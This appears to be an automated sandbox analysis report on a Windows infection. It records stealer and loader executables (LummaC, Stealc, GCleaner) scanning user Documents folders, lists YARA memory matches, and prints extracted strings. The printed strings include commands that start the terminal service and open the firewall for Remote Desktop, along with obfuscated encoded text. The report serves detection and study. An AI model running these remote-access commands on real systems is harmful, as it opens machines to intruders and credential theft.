Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS

Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: number of queries: 1001
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: number of queries: 1001

Source: Yara match	File source: 0000000B.00000003.2409337791.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2883656017.0000000001682000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2385182968.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2400766186.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2885090861.0000000001622000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2514450674.0000000000739000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5a20b6327b.exe PID: 5900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1e8e57d62a.exe PID: 1916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 186adf2617.exe PID: 5276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 186adf2617.exe PID: 3404, type: MEMORYSTR

Remote Access Functionality

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: 40c4d92e87.exe PID: 6712, type: MEMORYSTR

Yara detected GCleaner

Source: Yara match	File source: 15.2.dbe8776a6a.exe.de84000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.dbe8776a6a.exe.de2c000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dd662b5386.exe.e4a6000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.dbe8776a6a.exe.de58000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.dbe8776a6a.exe.e11e000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dd662b5386.exe.e2b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.dbe8776a6a.exe.e11e000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.dbe8776a6a.exe.deb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dd662b5386.exe.e4a6000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dd662b5386.exe.e284000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dd662b5386.exe.e22c000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dd662b5386.exe.e258000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2984395699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2588966469.000000000E496000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2729419667.000000000E11E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2623904415.000000000E284000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2727875020.000000000DEB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2727875020.000000000DE84000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3075849533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2623904415.000000000E2B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2625220408.000000000E4A6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2622048225.000000000E12A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2727875020.000000000DE2C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2623904415.000000000E22C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2623904415.000000000E258000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2695143135.000000000E10E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2727875020.000000000DE58000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2723992031.000000000DD22000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 5a20b6327b.exe PID: 5900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1e8e57d62a.exe PID: 1916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 186adf2617.exe PID: 5276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 186adf2617.exe PID: 3404, type: MEMORYSTR
Source: Yara match	File source: 4.2.9f19f13091.exe.3529550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.9f19f13091.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.9f19f13091.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.186adf2617.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.5a20b6327b.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.186adf2617.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2280248529.0000000003529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2456390039.00000000004A1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2647212161.0000000000DF1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2928007438.00000000008E1000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2383837159.0000000004950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2965760104.00000000008E1000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2270658684.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: 9f19f13091.exe PID: 3136, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000023.00000002.2908473776.0000000000EA1000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2770927261.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2859283986.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.2720138631.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2761501822.0000000000EA1000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2903358595.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 43a79b4335.exe PID: 3656, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Contains functionality to start a terminal service

Source: random.exe	String found in binary or memory: net start termservice
Source: random.exe, 00000000.00000000.2122136786.0000000000A01000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: net start termservice
Source: random.exe, 00000000.00000000.2122136786.0000000000A01000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: random.exe, 00000000.00000002.2132782149.0000000000A01000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: net start termservice
Source: random.exe, 00000000.00000002.2132782149.0000000000A01000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc 